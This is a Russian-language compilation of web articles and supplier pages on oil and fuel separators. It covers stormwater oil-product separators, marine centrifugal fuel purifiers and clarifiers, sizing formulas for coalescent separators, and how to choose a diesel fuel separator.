Как подобрать сепаратор для нефти и нефтепродуктов?

Назначение

Ливневые очистные сооружения — сепараторы нефтепродуктов SOR.

II (в дальнейшем сепараторы) предназначены для очистки сточных вод, содержащих нефтепродукты плотностью от 0,75 до 0,95 г/см3, температурой сточных вод выше плюс 4 °С, с концентрацией загрязнений до 0,5 % при непрерывной работе.

Сепараторы могут применяться для очистки дождевых сточных вод с территории автостоянок, автозаправочных станций, разливочных цехов и складов масел, нефти и т.п. Очистка ливневых стоков в данных сепараторах производится в самотечном режим (отсутствует потребление электроэнергии).

Преимущества

  • компактное исполнение без необходимости соединения элементов (отстойник, сепаратор, сорбционный фильтр) канализационными трубами;
  • малое заглубление, благодаря минимальным потерям по высоте;
  • малые эксплуатационные расходы в связи с отсутствием потребности в электричестве;
  • доступность всех элементов сепаратора для проведения очистки и замены сорбционного материала;
  • длительный срок службы, благодаря применению современных материалов.

Применение сепараторов нефтепродуктов в ливневых очистных сооружениях

Сепараторы нефтепродуктов SOR (в дальнейшем сепараторы) предназначены для очистки ливневых (поверхностных) сточных вод, содержащих нефтепродукты плотностью от 0,75 до 0,95 г/см3, температурой сточных вод выше плюс 4 °С, с концентрацией загрязнений до 0,5 % при непрерывной работе.

Сепараторы могут применяться в составе ливневых очистных сооружений для очистки дождевых и талых стоков с территории автостоянок, автозаправочных станций, разливочных цехов и складов масел, нефти и т.п.

Сепараторы не предназначены для очистки сточных вод, содержащих эмульгированные нефтепродукты, масла и жиры растительного и животного происхождения. На сепараторы не должны подаваться фекальные сточные воды.

В зависимости от концентрации загрязнений, характера загрязняющих веществ на входе и предъявляемых требований на выходе, можно выбрать один из пяти модификаций сепараторов (см.технические данные сепараторов нефтепродуктов SOR).

Основным конкурентным преимуществом очистных сооружений ливневого стока SOR является то, что верхняя часть полностью открыта, что делает доступным любую точку установок, позволяет видеть все «зеркало воды» и визуально оценить работу очистных сооружений и взять пробы для анализа. Кроме того, это позволяет без особых усилий производить обслуживание очистных сооружений, удалять накопившийся осадок и производить регенерацию или замену сорбента.

Технические данные сепараторов нефтепродуктов SOR

Ливневые очистные сооружения типа SOR (cепараторы нефтепродуктов) по функциональным признакам можно разделить на три части: отстойник, сепаратор коалесцентный, фильтр сорбционный.

Сепараторы исполнения SOR.II-…-JKS имеют отстойник для взвешенных веществ, сепаратор коалесцентный, фильтр сорбционный.

Сепараторы исполнения SOR.II-…-JK имеют отстойник для взвешенных веществ и сепаратор коалесцентный.

Сепараторы исполнения SOR.II-…-KS имеют сепаратор коалесцентный и фильтр сорбционный.

Сепараторы исполнения SOR.II-…-K имеют только сепаратор коалесцентный.

Сепараторы исполнения SOR.II-…-S имеют только фильтр сорбционный.

Вид климатического исполнения сепараторов У, категория размещения 2 по ГОСТ 15150-69 при температуре от плюс 1 до плюс 40 °С.

Габаритные, установочные и присоединительные размеры, масса ливневых очистных сооружений SOR приведены в таблице 1 на вкладке «Характеристики».

Основные параметры сепараторов нефтепродуктов SOR.II

Концентрация нефтепродуктов на входе в очистные сооружения ливневых стоков SOR.II-…-JKS, SOR.II-…-JK, SOR.II-…-KS, SOR.II-…-K должна быть не более 5 000 мг/л, на входе в SOR.II-…-S – не более 10 мг/л.

Концентрация нефтепродуктов на выходе, при соблюдении остальных условий (номинальное количество очищенных сточных вод, концентрация нефтепродуктов на входе) должна быть не более 5 мг/л для SOR.II-…-JK, SOR.II-…-K и не более 0,2 мг/л для SOR.II-…-JKS, SOR.II-…-KS, SOR.II-…-S.

Для достижения на выходя из ливневых очистных сооружений концентрации нефтепродуктов 0,05 мг/л необходимо применять сорбционную колонну SK.

Концентрация взвешенных веществ на входе очистных сооружений поверхностного стока должна быть для исполнений SOR.II-…-JKS, SOR.II-…-JK не более 400 мг/л; для исполнений SOR.II-…-KS, SOR.II-…-K – не более 50 мг/л; для исполнений SOR.II-…-S – не более 10 мг/л.

В случае если концентрация взвешенных веществ на входе сепараторов превышает указанные величины, сепараторы следует применять только в комплекте с водоочистным оборудованием, обеспечивающим предварительную очистку до указанных предельных концентраций.

Концентрация взвешенных веществ на выходе сепараторов исполнения SOR.II-…-JKS, SOR.II-…-JK, SOR.II-…-KS, SOR.II-…-K, SOR.II-…-S должна быть не более 10 мг/л.

Принцип работы ливневых очистных сооружений SOR.II

Принцип работы сепараторов исполнения SOR.II-…-JKS, SOR.II-…-KS: 

Загрязненная нефтепродуктами исходная вода в самотечном режиме по подводящему патрубку поступает на очистные сооружения поверхностного стока (сепаратор нефтепродуктов), в котором последовательно проходит зону отстаивания (поз.12) и сепарации (поз.13) на наклонном модуле коалесцентного сепаратора (поз.10).

При этом происходит эффективное осаждение взвешенных веществ и всплытие нефтепродуктов. Всплывшие нефтепродукты задерживаются разделительной перегородкой (поз.5) и далее сливаются вручную с помощью коллектора для сбора нефтепродуктов (поз.3) в резервуар для сбора нефтепродуктов (поз.2).

Собранные в резервуаре нефтепродукты периодически откачиваются и отправляются на регенерацию и утилизацию. Для увеличения эффективности очистки ливневых стоков на выходе из коалесцентного сепаратора размещена полиуретановая вспененная пластина ASISP (поз.4).

Для предотвращения подъема уровня воды в коалесцентном сепараторе выше расчетного, в случае загрязнения полиуретановой вспененной пластины ASISP, служит предохранительный перелив коалесцентного сепаратора (поз.8). Вода, прошедшая отстойник и сепаратор коалесцентный, через переливную перегородку (поз.

6) поступает на доочистку в сорбционный фильтр (поз.14), направление фильтрации – сверху вниз. При прохождении воды через сорбционные единицы (поз. 16) заполненные сорбционным материалом Фиброил (поз.17), происходит ее окончательная очистка.

Высокая сорбционная способность Фиброила обеспечивает содержание нефтепродуктов на выходе из сорбционного фильтра до 0,2 мг/л. Очищенная вода, пройдя через перелив сорбционного фильтра (поз. 11) и пробоотборник (поз. 7), вытекает из сепаратора по отводящему патрубку.

Принцип работы сепараторов исполнения SOR.II-…-JK, SOR.II-…-K (см. рис. 2) аналогичен принципу работы сепараторов исполнения SOR.II-…-JKS для отстойника и сепаратора коалесцентного. Принцип работы сепараторов исполнений SOR.II-…-S аналогичен принципу работы сепараторов исполнений SOR.II-…-JKS для сорбционного фильтра.

Общий вид сепараторов нефтепродуктов SOR.II-…-JKS, SOR.II-…-KS

  1. – корпус сепаратора
  2. – резервуар для сбора нефтепродуктов
  3. – коллектор для сбора нефтепродуктов
  4. – пластина полиуретановая вспененная
  5. – перегородка разделительная
  6. – перегородка переливная
  7. – пробоотборник
  8. – перелив коалесцентного сепаратора
  9. – петля монтажная
  10. – модуль наклонный коалесцентного сепаратора
  11. – перелив фильтра сорбционного
  12. – отстойник
  13. – сепаратор коалесцентный
  14. – фильтр сорбционный
  15. – диафрагма опорная фильтра сорбционного
  16. – единица сорбционная
  17. – материал сорбционный
  18. – погружная перегородка отстойника
  19. – погружная перегородка коалесцентного сепаратора
  20. – сальниковое уплотнение подводящего патрубка
  21. – сальниковое уплотнение отводящего патрубка

  1. – корпус сепаратора
  2. – резервуар для сбора нефтепродуктов
  3. — пробоотборник
  4. — пластина полиуретановая вспененная
  5. — перегородка разделительная
  6. — перелив фильтра сорбционного
  7. — коллектор для сбора нефтепродуктов
  8. — модуль наклонный коалесцентного сепаратора
  9. — перелив коалесцентного сепаратора
  10. – отстойник
  11. — сепаратор коалесцентный
  12. — перегородка отстойника погружная
  13. — перегородка коалесцентного сепаратора погружная
  14. — сальниковое уплотнение подводящего патрубка
  15. — сальниковое уплотнение отводящего патрубка

  1. — корпус сепаратора
  2. — пробоотборник
  3. — петля монтажная
  4. — перелив фильтра сорбционного
  5. — диафрагма опорная фильтра сорбционного
  6. — единица сорбционная
  7. — материал сорбционный
  8. — сальниковое уплотнение подводящего патрубка
  9. — сальниковое уплотнение отводящего патрубка

Источник: http://www.vodtech.ru/catalog/separatory-nefteproduktov/

Режимные параметры топливных и масляных сепараторов. Методы повышения качества очистки нефтепродуктов при сепарировании

  • Эксплуатационные показатели судов, надежность и эффективность эксплуатации дизелей могут быть существенно улучшены путем проведения на судах комплексной обработки горюче-смазочных веществ с помощью соответствующих систем подготовки и очистки, состоящих из отстойных цистерн, подогревателей, центробежных сепараторов, фильтров, гомогенизаторов, устройств для ввода химических присадок и др.
  • Необходимость и важность проведения работ по очистке и подготовке к использованию топлива и масла подтверждаются требованиями Правил технической эксплуатации (ПТЭ) дизелей.
  • В топливе содержатся различные примеси: вода, соединения серы, соли различных металлов, механические примеси.

В процессе подготовки топлива к сжиганию производится очистка его от примесей. Очистка осуществляется отстаиванием, сепарацией, фильтрацией и гомогенизацией.

Наиболее эффективным способом очистки дизельных и тяжелых топлив в судовых условиях является сепарация, при которой более тяжелые частицы отделяются под действием центробежных сил, возникающих при вращательном движении топлива в сепараторе.

Силы тяжести, действующие при отстое на механические примеси и воду, содержащиеся в высоковязких топливах, очень невелики, а расстояние, которое эти вредные вещества должны проходить при оседании на дно резервуара, велико. Поэтому эффективность отстоя невысока.

При сепарации центробежная сила во много тысяч раз превосходит силу тяжести, следовательно, и эффект очистки очень высок. Так как расстояние, которое примеси должны проходить в барабане сепаратора при отделении от топлива, значительно меньше, чем при отстое в цистерне, то процесс сепарации является почти мгновенным.

Рис. 1. Отстой и сепарация нефтепродукта: а — неподвижная цистерна; б — цистерна, вращающаяся с большой скоростью.

На рис.1 приведены два эскиза цилиндрической плоскодонной цистерны, содержащей смесь нефтепродукта (топлива), воды и механических примесей. Неподвижная цистерна (рис. 1, а) на ¾ заполнена указанной смесью, а поступление потока смеси через питательный трубопровод 1 прекращено.

Все три компонента смеси стали разделяться под действием силы тяжести (отстой). Механические примеси 4 осели на дно топливо 2 всплыло наверх, а вода 3 заняла промежуточное положение. Цистерна вращается с большой скоростью относительно вертикальной оси, и содержимое подвергается действию центробежной силы (Рис. 1, б).

В результате этого все три компонента занимают примерно такое же положение, как при отстое.

В связи с тем, что центробежная сила пропорциональна массе тела, механические примеси 4, которые в данном случае являются самыми тяжелыми, занимают дальнее положение от центра вращения, а топливо 2, которое является самым легким, располагается ближе к центру вращения цилиндра. Между ними располагается слой воды 3, который имеет промежуточную плотность.

Если по питательному трубопроводу 1 непрерывно подается смесь, то такое же количество чистого топлива непрерывно выходит через горловину цистерн (барабана). Этот метод удаления жидкости без остановки вращающегося барабана применен в сепараторах.

Прежде чем часть смеси выходит через горловину из цилиндра, она проходит путь, начиная со дна цилиндра и до его верха.

При этом она все время подвергается действию центробежной силы, и самые тяжелые частицы смеси отбрасываются от центра вращения на самое дальнее расстояние.

Поэтому часть содержимого, выходящая непрерывно через горловину барабана вследствие вытеснения дополнительной смесью, поступающей через питательный трубопровод, является чистым нефтепродуктом.

Для сокращения расстояния, проходимого тяжелыми частицами смеси до того, как они отделятся от более легких частиц, смесь в барабане разделяют на тонкие слои посредством множества конических дисков, расстояние между которыми около 1…5 мм (рис. 2). Конические диски вращаются вместе с барабаном.

Рис. 2. Схема движения механических примесей, воды и очищенного топлива между дисками барабана сепаратора.

В тонких слоях топлива, расположенных между каждой парой конических дисков, содержатся частицы механических примесей и воды. Центробежная сила стремится отбросить их в направлении от оси вращения барабана, т. е.

к его внутренней поверхности.

Однако движению частиц в этом направлении препятствуют нижние поверхности дисков, следовательно, частицы механических примесей и вода вынуждены сползать вниз по этим поверхностям, как показано стрелками 2.

Очищенное топливо как более легкий компонент смеси, наоборот, стремится занять более близкое положение к оси вращения барабана.

Но так как движению очищенного топлива в перпендикулярном направлении препятствует верхняя сторона каждого диска, то под напором вновь поступающей жидкости топливо проталкивается по зазорам между дисками вверх к выходу из барабана, как показано стрелками 1, т. е.

в направлении, противоположном движению твердых частиц и воды. Подвод очищаемого нефтепродукта осуществляется через отверстия 3 в сепарационных (конических) дисках. Линия «у – у» – раздел жидких фаз – воды и нефтепродукта.

  1. В процессе очистки механические примеси и вода собираются в кольцевом пространстве 4 (грязевой камере), образуемом пакетом дисков и внутренней поверхностью корпуса барабана, причем вода, двигаясь вверх и проходя над верхним коническим диском, как показано стрелкой 5, удаляется из сепаратора, а механические примеси оседают на внутренней поверхности барабана.
  2. Сепараторы можно применять для очистки нефтепродуктов методами пурификации и кларификации.
  3. Пурификация – это сепарирование, при котором от топлива отделяются грязь и вода.
  4. Когда в топливе содержится мало воды, но загрязнение его значительно, применяют способ кларификации, при котором от топлива отделяются твердые примеси.

Барабаны сепараторов фирмы «Де Лаваль», собранные для работы в режимах пурификации и кларификации, показаны на рис. 3.

Рис. 3. Барабаны топливных сепараторов: а — пурификатор; б — кларификатор.

Пурификатор (рис. 3, а) имеет распределитель А, по которому необработанное топливо подается к дискам через имеющиеся в них распределительные отверстия 1 и 3. Здесь между дисками начинается сепарация топлива.

Вода удаляется по каналу, образуемому верхним диском и крышкой барабана, через кольцевое отверстие. Очищенное топливо отводится тоже через кольцевое выпускное отверстие, но расположенное значительно ближе к оси вращения барабана.

Механические примеси (шлам) отбрасываются как наиболее тяжелые частицы к периферии и оседают на внутренней стенке барабана.

Барабан-кларификатор, в отличие от пурификатора, имеет не два, а одно кольцевое выпускное отверстие, предназначенное только для отвода из сепаратора очищенного нефтепродукта (рис. 3, б).

Топливо, прошедшее грубую очистку в пурификаторе, или неочищенное, не содержащее воду, подводится по распределителю А, так же как в пурификаторе, к нижней части барабана.

Однако в отличие от пурификатора нефтепродукт не пропускается через отверстия в дисках, так как они заглушены вставкой, а направляется в обход нижней кромки распределителя, поступая к наружным концам дисков.

Далее начинается процесс тонкой очистки нефтепродуктов, который аналогичен процессу, происходящему в пурификаторе. Очищенное топливо движется в междисковых пространствах снизу вверх от периферии по направлению к оси вращения барабана и по каналу через кольцевое отверстие отводится наружу. Все отсепарированные из нефтепродуктов примеси остаются в грязевой камере.

Таким образом, так как в кларификаторе самый нижний диск не имеет распределительных отверстий, все вышележащие диски как бы экранизируются от поступающего в барабан топлива.

Следовательно, топливо, подвергающееся кларификации, вынуждено двигаться к наружным концам этих дисков прежде, чем начнет перемещаться вверх и внутрь к оси вращения барабана.

Топливо будет проходить в кларификаторе большее расстояние и находиться в барабане дольше. Следовательно, очистка будет более качественной.

Таким образом, кларификатор отличается от пурификатора только внутренним устройством барабана.

Если необходимо, барабаны этих двух сепараторов можно приспособить так, что пурификатор будет работать как кларификатор, и наоборот.

Например, достаточно в пурификаторе регулировочную шайбу 2 заменить крышкой, заглушить отверстия 1 и заменить верхний диск, как барабан может работать в режиме кларификации.

При работе по методу кларификации сепаратор запускают с сухим барабаном. После того как скорость вращения барабана достигнет необходимого значения, его постепенно наполняют топливом.

Перед работой по методу пурификации барабан сепаратора заполняют водой, нагретой до температуры очищаемого топлива. Налитая вода образует так называемый водяной затвор, обеспечивающий непрерывный отвод воды. Количество воды, содержащееся в водном затворе, может уменьшаться вследствие испарения или по другим причинам.

Сепаратор работает нормально до тех пор, пока вертикальная линия соприкосновения между топливом и водяным затвором не переместится по направлению к стенке барабана до канала для выпуска воды, образованного удлиненным верхним конусным диском и крышкой барабана. С этого момента топливо начнет выходить из отверстия для выпуска воды.

Качество очистки и количество топлива в отходах зависят от величины внутреннего диаметра регулирующей шайбы.

Поэтому к каждому сепаратору прилагается комплект регулирующих шайб с различными внутренними диаметрами, которые подбирают в зависимости от плотности сепарируемого топлива.

При нормальных условиях эксплуатации сепаратора содержание топлива в отсепарированной воде не должно превышать 1%.

Метод пурификации целесообразно применять при наличии в топливе 3% и более воды и незначительного количества механических примесей (менее 0,3%). Методом кларификации рекомендуется пользоваться тогда, когда в топливе мало воды, но загрязнение его механическими примесями значительно.

Если топливо сильно обводнено и засорено механическими примесями, то применяют двухступенчатый метод очистки двумя сепараторами, включенными последовательно.

Сначала топливо пропускают через сепаратор, собранный на работу по методу пурификации, а затем через кларификатор.

Работа пурификатора и кларификатора, соединенных последовательно, считается нормальной, если в первом удаляется из топлива 85% примесей, а во втором 15%.

Механические примеси, скапливающиеся в грязевой камере сепаратора, удаляются оттуда вручную, причем сепаратор необходимо остановить. Очистка барабанов и дисков требует много времени и труда.

Поэтому в последнее время находят все более широкое применение так называемые самоочищающиеся сепараторы, которые можно очищать без вскрытия, что создает большие удобства в эксплуатации и повышает производительность и ресурс сепараторов.

Из самоочищающихся сепараторов грязевые отложения удаляют через периодически открываемые или постоянно открытые щели в барабане.

Нефтепродукт, подлежащий сепарации, поступает в барабан самоочищающегося сепаратора по трубопроводу 13 (рис. 4). Очищенный нефтепродукт отводится по трубопроводу 11. Так как барабан работает по способу кларификации, его горловина закрыта крышкой 12.

Грязевая камера 10 выполнена конусообразной. В корпусе барабана по окружности расположены окна 2, закрытые в рабочем положении подвижным поршнем (фальшднищем) 3.

Под поршнем имеется камера 4, заполненная водой, подаваемой из отдельной цистерны по трубопроводу 7.

Рис. 4. Барабан самоочищающегося сепаратора.

При вращении барабана центробежная сила, действующая на содержимое барабана, стремится его открыть, т. е. опустить подвижное днище 3 вниз. Однако оно удерживается в верхнем положении напротив уплотнительного кольца 1 давлением воды, создаваемым тоже под действием центробежной силы в камере 4.

Перед очисткой барабана подачу рабочей воды переводят из камеры 4 в камеру 5, переключая ее с трубопровода 7 на трубопровод 8.

В результате этого в камере 5 создается давление, которое отжимает кольцо 6 вниз, и через открывшиеся клапаны 9 рабочая вода вытекает из камеры 4.

После этого подвижное днище 3, освобожденное от давления воды в камере 4, отжимается вниз центробежной силой содержимого барабана на долю секунды и шлам из грязевой камеры выталкивается наружу через выпускные окна 2.

Таким образом, шлам из грязевой камеры удаляется автоматически, путем открытия выпускных окон при полных оборотах барабана.

Кроме дисковых сепараторов, применяют сепараторы роторного (трубчатого) типа.

Частота вращения роторов в сепараторах трубчатого типа 200…750 с-1 (12000…45000 об/мин), в сепараторах дискового типа 67… 150 с-1 (4000…9000 об/мин).

Для эффективной сепарации тяжелые топлива необходимо предварительно подогревать до определенной температуры и снижать производительность сепаратора.

Маловязкие топлива сепарируют без подогрева при полной производительности сепаратора, средневязкие – с подогревом до 75…85°С при производительности 30% полной, а высоковязкие – с подогревом до 96…98°С при производительности не более 15% полной.

Повышение температуры более 98°С недопустимо, так как возникает опасность разрушения водяного затвора в сепараторе.

Каждая сепарационная установка должна иметь трубопровод горячей воды, подача которой в сепаратор необходима для прогревания его перед пуском и для промывания барабана во время очистки. Вместо горячей воды рекомендуется применять водные растворы химических моющих препаратов, например раствор химического препарата «Поликлепс».

Метод сепарации имеет и недостатки. Так, снижение механических примесей и воды сопровождается потерями горючей части топлива – тяжелых ее компонентов. Эти потери могут достигать 2…3% (в ряде случаев до 6 …8%). Кроме того, подогрев топлива усиливает окислительные процессы, в результате в топливе повышается содержание смолистых веществ.

В последние годы в связи с увеличением плотности применяемых топлив метод сепарации утрачивает свое значение как универсальный метод. Это объясняется сложностью отделения воды от топлива (плотности их мало отличаются) и изменением отношения эксплуатационников к содержанию воды в топливе.

Установлено, что в топливе повышенной и высокой вязкости при-сутствие воды в тонкодисперсном состоянии (в виде топливоводяных эмульсий) не вредно (как считалось ранее), а полезно, так как при сжигании такой эмульсии повышается полнота сгорания топлива.

В связи с этим из топлива повышенной вязкости можно воду не удалять (при содержании воды не более 5%).

Маловязкие топлива необходимо освобождать от воды, так как образование в них топливоводяных эмульсий затруднительно. Воду из вязких топлив необходимо удалять только при аварийных ее содержаниях (более 5%) и очистку можно производить не с помощью сепараторов, а путем фильтрации. Необходимо удалять из топлива морскую воду при любом ее содержании.

Очистка топлива сепараторами не исключает необходимости применения в системах фильтров. Это объясняется тем, что механические частицы, размер которых колеблется от 1 до 10 мкм, не отделяются при сепарировании.

Источник: https://cyberpedia.su/12×4316.html

Как подобрать сепаратор нефти? Формулы, характеристики, правила подбора

Компания «Дунайбудинвест» — официальный и эксклюзивный поставщик оборудования Biocent (Польша) на рынке Украины. Предлагаем качественный европейский продукт по низким ценам. Наши сепараторы нефти изготавливаются из: пластика, стеклопластика и железобетона.

Как подобрать сепаратор нефти?

  • Выбор сепаратора нефти начинается из определения номинального размера коалесцентного сепаратора
  •  Для определения номинального размера коалесцентного сепаратора (NG) используется следующая формула:
  • NG  = ( Q R + f X * Q S ) *f D
  • Условные обозначения:
  • NG — номинальный размер, пропускная способность [л/с]
  • Q р — расход дождевых сточных вод [л/с]
  • Q S — расход технологических сточных вод [л/с]
  • f X — коэффициент разделения помех
  • f D — коэффициент, учитывающий плотность отделяемого вещества
  • Коэффициент сложности разделения f x
Описание Фактор f Х
Очистка технологических сточных вод от автомоек, мойка загрязненных маслом деталей, автомобильные и механические мастерские 2
Очистка дождевых сточных вод с территорий, подверженных углеводородному загрязнению (автостоянки, автозаправочные станции, промышленные зоны) 1
Профилактическое удержание потенциально больших утечек нефтепродуктов (трансформаторные станции, перегрузочные станции, склады хранения топлива) 1

Коэффициент разделения f D

Плотность отделяемого вещества [ г/см 3 ] Коэффициент f D
до 0,85 1
0,85 — 0,90 1,5
0,90 — 0,95 2
  1. Значение Q R определяется по следующей формуле:
  2. Q R = F *q*y
  3. Условные обозначения:
  4. F — площадь водосбора [га]
  5. q — интенсивность надежного дождя [л/сек га] (можно предположить на уровне 150 [л/сек га].) Это скорость оттока, соответствующая дождю с вероятностью появления, равным 20% и продолжительностью около 20 минут)
  6. у — коэффициент расхода зависит от типа поверхности.
  7. Коэффициент тяготения y зависит от типа бассейна
Тип водосбора Коэффициент поверхности «у «
Крыши 0,90 — 1,00
Закаленная площадь 0,90
Куб 0,80 — 0,85
асфальт 0,80 — 0,90
Камень и дерево 0,75 — 0,85
Гравий 0,15 — 0,30
Городские здания плотно — доходные дома 0,70 — 0,80
Компактные здания 0,50 — 0,70
Здания рыхлые 0,30 — 0,50
Виллы 0,25 — 0,30
Неразвитая территория 0,10 — 0,25
Парки и зеленые зоны до 0,15

Qs приток на автомойки и мойки высокого давления и чистящие агрегаты:

Для автомоек и чистящих агрегатов подача выбирается для первой стиральной машины — 2 [л/с], для каждой следующей — 1 [л/с]

  Выбор песка для сепаратора каталоганта

Определение номинального размера отстойника для сепаратора V OS

Количество подвесок Примеры приложений Активный объем отстойника
маленький технологические сточные воды с небольшим количеством взвешенных твердых частиц, дождевые сточные воды с относительно чистых участков, таких как насыпи резервуаров для хранения, крытые станции технического обслуживания, подземные автостоянки и т. д. 100 х НГ
средний автозаправочные станции, ручные автомойки, мойка смазанных деталей, автомойки, открытые автостоянки, дороги, улицы и площади, промышленные предприятия 200 х НГ
высокая автомойки, сельскохозяйственные машины, строительные машины, автомойки — транспортные средства минимум 5000 л отстойника 300 х НГ

Выбор сепаратора коацента с байпасом

При выборе сепаратора с байпасом нам необходимо рассчитать два значения расхода для такого устройства — номинальный расход (нг) и максимальный расход (нг)

Номинальный расход [нг] коалесцентного сепаратора с байпасом определяется на основе расчета расхода, который необходимо очистить перед попаданием в окружающую среду. Это значение как минимум не менее 15 [л/сек га] указано в постановлении министра охраны окружающей среды от 2014 года.

  • Выбор номинального размера сепаратора (нг) определяется по следующей формуле:
  • НГ ≥ 15 х F
  • Условные обозначения:
  • НГ — номинальный размер, поток для очистки [л / с]
  • F — площадь водосбора [га]
  • Выбор максимального размера разделителя (NG) определяется по следующей формуле:
  • NG = Q R * f D
  • Условные обозначения:
  • NG — номинальный размер, пропускная способность [л/с]
  • Q р — расход дождевых сточных вод [л / с]
  • f D — коэффициент, учитывающий плотность отделяемого вещества
  • Коэффициент разделения f D
Плотность отделяемого вещества [г / см 3 ] Коэффициент f D
до 0,85 1
0,85 — 0,90 1,5
0,90 — 0,95 2
  1. Значение Q R определяется по следующей формуле:
  2. Q R = F *q*y
  3. Условные обозначения:
  4. F — площадь водосбора [га]
  5. q — интенсивность надежного дождя [л/сек га] (можно предположить на уровне 150 [л/сек га].) Это скорость оттока, соответствующая дождю с вероятностью появления, равным 20% и продолжительностью около 20 минут)
  6. у — коэффициент расхода зависит от типа поверхности.
  7. Коэффициент тяготения y зависит от типа бассейна
Тип водосбора Коэффициент трейлинга «у «
Крыши 0,90 — 1,00
Закаленная площадь 0,90
Куб 0,80 — 0,85
Асфальт 0,80 — 0,90
Камень и дерево 0,75 — 0,85
Гравий 0,15 — 0,30
Городские здания плотно — доходные дома 0,70 — 0,80
Компактные здания 0,50 — 0,70
Здания рыхлые 0,30 — 0,50
Виллы 0,25 — 0,30
Неразвитая территория 0,10 — 0,25
Парки и зеленые зоны до 0,15

Что такое коалесцентные сепараторы нефти, принцип работы нефтеуловителя?

Коалесцентные сепараторы нефти.

ООО «Дунайбудинвест» предлагает своим клиентам коалесцентный сепаратор нефтяных веществ европейского качества, который позволяет очищать все сточные воды, протекающие через устройство. Он используется для очистки сточных вод от хранилищ нефти, автозаправочных станций, промышленных предприятий, складов отходов, гаражей и т.д.

Благодаря использованию коалесцентных фильтров с очень высокой эффективностью очистки сточных вод, сепараторы BIOCENT (ПОЛЬША) могут использоваться с очень высокими концентрациями загрязняющих веществ в сточных водах и большой емкостью для сбора нефти. исключает использование дополнительные удерживающие баки для масла.

 Сепаратор BIOCENT соответствует требованиям стандарта PN-EN 858 (сепараторы класса I) и постановления министра охраны окружающей среды от 2014 года (о введении сточных вод в воду или в землю — максимально допустимая концентрация нефтяных веществ, вводимых в приемник).

Все нефтеуловители Биоцент (ПОЛЬША) относятся к тяжелому классу, в стандартном исполнении они оснащены чугунными люками DN 600 класса C 250 с возможностью использования другого класса люков.

Трубки фильтра имеют поплавковый затвор, который защищает приемник от утечки собранных веществ в случае переполнения.

Перед коалесцирующим сепаратором Биоцент (ПОЛЬША) должна быть шлам камера или необходимо подбирать сепаратор со встроенной шлам-камерой. Коалесцентные сепараторы производных нефти выбраны для требуемых сточных вод. Вся серия включает в себя устройства с пропускной способностью: 1,0 л / с — 950 л/с.   

По всем вопросам просьба обращайтесь в компанию «Дунайбудинвест» — звоните или напишите нам на почту: zakaz@dbi.com.ua

Источник: https://dbi.com.ua/podbor-separatora-nefti-po-formulam

Как подобрать сепаратор дизтоплива для современного мотора

Дата: 08.12.2017  |  Кравцов Олег  |  Просмотров: 6082

Нужно ли очищать дизельное топливо?

Здесь расхождений во мнениях нет — нужно.Причем, вопреки распространенному мнению, загрязненное дизельное топливо — не только украинская проблема.Вода и твердые частицы в дизельном топливе быстро выводят из строя дорогостоящую топливную аппаратуру.

Низкие температуры приводят к кристаллизации воды, загустеванию и парафинизации топлива.Штатные топливные фильтры довольно быстро выходят из строя, а стоят зачастую недешево.Выход — устанавливать дополнительную систему очистки с недорогими сменными элементами.

Для холодных условий работы — с подогревом.

Терминология

Когда речь заходит об устройствах очистки топлива, встречаются разные термины — «фильтр», «сепаратор», «фильтр-сепаратор», «фильтр-влагоотделитель» и т. д.На самом деле, современные системы очистки дизельного топлива часто представляют собой комбинированное устройство — сепаратор влаги и крупных частиц, совмещенный с фильтром тонкой (или не очень тонкой) очистки.

Так, в каталогах BALDWIN DAHL используется термин «Diesel Fuel Filter / Water Separator» (Фильтр дизельного топлива / Сепаратор воды).

У SEPAR 2000 встречается похожий термин «Water Separator an Fuel Filter».В то же время, в описаниях сами производители для краткости зачастую используют термин «filter».В Украине подобные устройства чаще называют просто «сепаратор».

Критерий выбора — расход топлива

Оптимальная работа сепаратора достигается при соответствии условий работы конкретного двигателя рабочим характеристикам сепаратора.Одной из важнейших характеристик является рекомендуемый расход топлива.

Это связано с тем, что эффективность процессов разделения во многих устройствах зависит от гидродинамики потока, которая, в свою очередь, определяется расходом.

В связи с этим нельзя не упомянуть об одном распространенном явлении.Отечественные продавцы популярного сепаратора SEPAR 2000 часто рекомендуют данный сепаратор для установки на легковые автомобили.При этом младшая модель в линейке SEPAR 2000 рассчитана на расход 300 л/час.Это расход топлива суперкара на скорости 350 км/час.Или тяжелого грузовика, экскаватора или катера.

Что касается легковых автомобилей, то, если джип за час проходит 100 км и расходует 20 л топлива, то часовой расход составит 20 л — в 15 раз меньше, чем у самого маленького сепаратора SEPAR 2000!

В данном случае, такая большая разница имеет принципиальное значение.Патентованный процесс разделения в SEPAR 2000 основан на центробежном эффекте, который, в свою очередь, достигается только при достаточной скорости потока.

При малом расходе на большом рабочем сечении центробежный эффект достигут не будет, топливо будет просто стекать в отстойник.

Большая часть воды и примесей, конечно, отстоится естественным образом, но максимальной отдачи от центробежного эффекта достигнуть не удастся.

Соответственно, возрастет нагрузка на встроенный фильтр тонкой очистки.

Сильная зависимость степени очистки от расхода жидкости — общий недостаток, присущий системам центробежной очистки.Полностью избавиться от него невозможно хотя бы в силу того, что расход топлива при различных режимах работы двигателя меняется в разы.

Но не следует и усугублять его, используя заведомо неподходящие по характеристикам устройства.

Поэтому выбирать сепаратор надо исходя, прежде всего, из среднего расхода топлива в соответствии с рекомендациями производителя.

Слишком маленькая пропускная способность сепаратора приводит к повышенной нагрузке на топливный насос, потере мощности и другим негативным эффектам.Слишком большая — к лишним затратам и, зачастую, к снижению эффективности очистки.

В качестве дополнительного критерия можно ориентироваться на мощность двигателя — производители сепараторов часто указывают и эту характеристику.

С подогревом и без него

Даже при использовании зимнего дизельного топлива, в холодное время года могут наблюдаться проблемы с запуском дизельного двигателя.

Причиной является естественное загустевание топлива, а также парафинизация (образование парафиновых хлопьев) при низкой температуре.Решением проблемы является использование сепараторов с подогревом.

Подогрев представляет собой нагревательный элемент, встраиваемый в корпус сепаратора.

  • Исполнение с подогревом существенно (на 50-100%) дороже исполнения без подогрева.
  • Как правило, можно использовать модели сепараторов дизтоплива с подогревателем, установленным на заводе (в обозначении такие модели имеют букву H), или можно приобрести сепаратор без подогревателя, и при необходимости докупить и установить его позже.

При выборе варианта с подогревом или без него нужно, прежде всего, руководствоваться климатическими условиями.Для северных районов желательно выбирать вариант с подогревом.

Для регионов, в которых столбик термометра в зимнее время часто держится на отметке -10°C и ниже — подогрев также желателен, но надо обратить внимание на особенности эксплуатации.Если речь идет о коммерческом транспорте, интенсивно эксплуатирующемся в любое время года — подогрев нужен.

